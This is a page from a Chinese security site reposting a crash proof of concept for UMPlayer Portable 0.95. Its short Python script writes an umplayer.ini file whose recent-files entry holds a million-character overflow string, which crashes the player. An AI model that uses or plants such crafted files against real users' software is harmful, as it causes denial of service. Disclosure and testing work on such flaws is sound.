首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
UMPlayer Portable 0.95 Crash PoC
来源:vfocus.net 作者:p3kok 发布时间:2012-11-30  

# Exploit Title: UMPlayer (Portable Edition)
# Date: 2012-11-28
# Exploit Author: p3kok
# Vendor Homepage: http://www.umplayer.com/
# Software Link: http://sourceforge.net/projects/umplayer/ or http://www.umplayer.com/download/
# Version: 0.95(Portable Edition) Compiled 4.7.0
# Tested on: xp sp 2

###### Crash POC ######
# Aplication Crashed when mouse over on "Recent files" submenu under "Open" menu
# 1. Generate umplayer.ini file with this code
# 2. Put umplayer.ini file in UMPlayerPortable directory
# 2. Open UMPlayer.exe
# 3. From "Open" menu, Clik "Recent files" and got the crash

file =("[%General]" + "\n"
"mplayer_bin=mplayer/mplayer.exe" + "\n"
"driver\\vo=\"directx,\"" + "\n"
"driver\\ao=dsound" + "\n"
"use_screenshot=true" + "\n"
"screenshot_directory=./screenshots" + "\n"
"recordings_directory=./recordings" + "\n"
"dont_remember_media_settings=false" + "\n"
"dont_remember_time_pos=false" + "\n"
"audio_lang=" + "\n"
"subtitle_lang=" + "\n"
"use_direct_rendering=false" + "\n"
"use_double_buffer=true" + "\n"
"use_soft_video_eq=false" + "\n"
"use_slices=false" + "\n"
"autoq=6" + "\n"
"add_blackborders_on_fullscreen=false" + "\n"
"turn_screensaver_off=false" + "\n"
"avoid_screensaver=true" + "\n"
"use_soft_vol=true" + "\n"
"softvol_max=110" + "\n"
"use_scaletempo=-1" + "\n"
"use_hwac3=false" + "\n"
"use_audio_equalizer=true" + "\n"
"global_volume=true" + "\n"
"volume=50" + "\n"
"mute=false" + "\n"
"autosync=false" + "\n"
"autosync_factor=100" + "\n"
"use_mc=false" + "\n"
"mc_value=0" + "\n"
"loop=false" + "\n"
"osd=0" + "\n"
"file_settings_method=hash" + "\n"
"font_cache=false" + "\n"
"playCount=11" + "\n" + "\n" )

junk = "\x41" * 1000000
file+="[history]" + "\n"
file+="recents=" + junk

out_file = open("umplayer.ini",'w')
out_file.write(file)
out_file.close()

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Apple QuickTime 7.7.2 MIME Typ
·Network Shutdown Module <= 3.2
·mcrypt <= 2.6.8 stack-based bu
·Windows AlwaysInstallElevated
·Aviosoft Digital TV Player Pro
·Free WMA to MP3 converter v1.6
·BlazeVideo HDTV Player 6.6 Pro
·Android 4.0.3 <= Browser Remot
·Twitter 5.0 Eavesdropping Proo
·IBM System Director Remote Sys
·mcrypt <= 2.5.8 STACK based ov
·MySQL (Linux) Stack Based Buff
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved